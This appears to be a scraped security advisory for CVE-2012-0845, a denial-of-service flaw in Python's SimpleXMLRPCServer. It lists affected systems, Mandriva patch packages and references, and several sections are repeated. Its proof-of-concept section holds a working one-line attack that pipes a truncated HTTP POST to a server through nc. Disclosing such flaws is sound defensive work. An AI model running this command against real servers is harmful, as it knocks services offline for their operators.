Python SimpleXMLRPCServer Denial Of Service Vulnerability
BID:51996
Info
Python SimpleXMLRPCServer Denial Of Service Vulnerability
| Bugtraq ID: | 51996 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2012-0845 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 14 2012 12:00AM |
| Updated: | Apr 13 2015 08:30PM |
| Credit: | Dan Callaghan |
| Vulnerable: |
Ubuntu Ubuntu Linux 11.10 i386 Ubuntu Ubuntu Linux 11.10 amd64 Ubuntu Ubuntu Linux 11.04 powerpc Ubuntu Ubuntu Linux 11.04 i386 Ubuntu Ubuntu Linux 11.04 ARM Ubuntu Ubuntu Linux 11.04 amd64 Ubuntu Ubuntu Linux 10.04 sparc Ubuntu Ubuntu Linux 10.04 powerpc Ubuntu Ubuntu Linux 10.04 i386 Ubuntu Ubuntu Linux 10.04 ARM Ubuntu Ubuntu Linux 10.04 amd64 Sun Solaris 11 Sun Solaris 10 Red Hat Enterprise Linux Workstation Optional 6 Red Hat Enterprise Linux Workstation 6 Red Hat Enterprise Linux Server Optional 6 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux HPC Node Optional 6 Red Hat Enterprise Linux HPC Node 6 Red Hat Enterprise Linux Desktop Optional 6 Red Hat Enterprise Linux Desktop 6 Python Software Foundation Python 3.2.2 Python Software Foundation Python 2.7.2 Oracle Enterprise Linux 6.2 Oracle Enterprise Linux 6 Mandriva Linux Mandrake 2011 x86_64 Mandriva Linux Mandrake 2011 Mandriva Linux Mandrake 2010.1 x86_64 Mandriva Linux Mandrake 2010.1 MandrakeSoft Enterprise Server 5 x86_64 MandrakeSoft Enterprise Server 5 Gentoo Linux Avaya Aura Experience Portal 6.0 |
| Not Vulnerable: | |
Discussion
Python SimpleXMLRPCServer Denial Of Service Vulnerability
Python is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted HTTP POST request.
Successful exploits will allow attackers to cause a denial-of-service condition.
Python versions 2.7.2 and 3.2.2 are vulnerable; other versions may also be affected.
Python is prone to a denial-of-service vulnerability.
An attacker can exploit this issue by sending specially crafted HTTP POST request.
Successful exploits will allow attackers to cause a denial-of-service condition.
Python versions 2.7.2 and 3.2.2 are vulnerable; other versions may also be affected.
Exploit / POC
Python SimpleXMLRPCServer Denial Of Service Vulnerability
An attacker can use readily available tools to exploit this issue.
The following exploit is available:
$ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345
An attacker can use readily available tools to exploit this issue.
The following exploit is available:
$ echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345
Solution / Fix
Python SimpleXMLRPCServer Denial Of Service Vulnerability
Solution:
Updates are available. Please see the references for more information.
MandrakeSoft Enterprise Server 5 x86_64
MandrakeSoft Enterprise Server 5
Mandriva Linux Mandrake 2010.1 x86_64
Mandriva Linux Mandrake 2010.1
Mandriva Linux Mandrake 2011 x86_64
Mandriva Linux Mandrake 2011
Solution:
Updates are available. Please see the references for more information.
MandrakeSoft Enterprise Server 5 x86_64
-
Mandriva lib64python2.5-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva lib64python2.5-devel-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-base-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.5.2-5.12mdvmes5.2.x86_64.rpm
http://www.mandriva.com/en/downloads/
MandrakeSoft Enterprise Server 5
-
Mandriva libpython2.5-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva libpython2.5-devel-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-base-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.5.2-5.12mdvmes5.2.i586.rpm
http://www.mandriva.com/en/downloads/
Mandriva Linux Mandrake 2010.1 x86_64
-
Mandriva lib64python2.6-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva lib64python2.6-devel-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.6.5-2.5mdv2010.2.x86_64.rpm
http://www.mandriva.com/en/downloads/
Mandriva Linux Mandrake 2010.1
-
Mandriva libpython2.6-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva libpython2.6-devel-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.6.5-2.5mdv2010.2.i586.rpm
http://www.mandriva.com/en/downloads/
Mandriva Linux Mandrake 2011 x86_64
-
Mandriva lib64python-devel-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva lib64python2.7-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.7.2-2.2-mdv2011.0.x86_64.rpm
http://www.mandriva.com/en/downloads/
Mandriva Linux Mandrake 2011
-
Mandriva libpython-devel-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva libpython2.7-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva python-docs-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/ -
Mandriva tkinter-apps-2.7.2-2.2-mdv2011.0.i586.rpm
http://www.mandriva.com/en/downloads/
References
Python SimpleXMLRPCServer Denial Of Service Vulnerability
References:
References:
- (CVE-2012-0845) CVE-2012-0845 python (SimpleXMLRPCServer): DoS (excessive CPU us (Red Hat)
- CVE-2012-0845 Python v2.7.2 / v3.2.2 (SimpleXMLRPCServer): DoS (excessive CPU us (Python Software Foundation)
- Multiple vulnerabilities in Python (Oracle)
- Python Homepage (Python Software Foundation)
- ASA-2012-260: python security update (RHSA-2012-0744) (Avaya)
- Xerox Security Bulletin XRX13-007 (Xerox)